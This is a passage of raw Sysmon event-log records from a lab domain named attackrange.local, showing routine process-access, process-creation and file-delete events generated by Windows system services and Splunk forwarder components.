09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976520Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976519Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976518Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976517Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976516Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976515Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976514Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8866-6151-7B79-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976513Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8866-6151-7B79-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976512Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.516{69CF5F33-8866-6151-7B79-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976511Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.265{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DEEFDEA13F129176A2B320E22467EE1,SHA256=471F6E883073D7944F58912A8DE554AF4E639FC10F5F128CEBF86DE4B69F0B8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976510Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.171{69CF5F33-8865-6151-7A79-00000000FD01}9361996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976509Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC326FD1DEF01DC5754C9A6F05D0F12,SHA256=99ACE16B79F930675278EE57B6826905B40A83FFF2804CA32D6578BBF9F96A30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:27.635{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC36CC4171005809B87450C358035FA,SHA256=07976DFC390671EF8593E569C20A43B1231551F6B709A1E24B3D9A385A10A9E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976555Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8867-6151-7D79-00000000FD01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976554Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976553Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976552Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976551Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976550Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976549Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976548Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976547Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8867-6151-7D79-00000000FD01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976546Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976545Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976544Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.905{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8867-6151-7D79-00000000FD01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976543Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.890{69CF5F33-8867-6151-7D79-00000000FD01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976542Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.593{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F11A51B51D9AFFA5C3135CDB969E5B3,SHA256=A095BCCF5CCCC5B6FADDF713356B3085B321CD20A61E4F98C86759976CD257CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976541Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8867-6151-7C79-00000000FD01}2540C:\Program 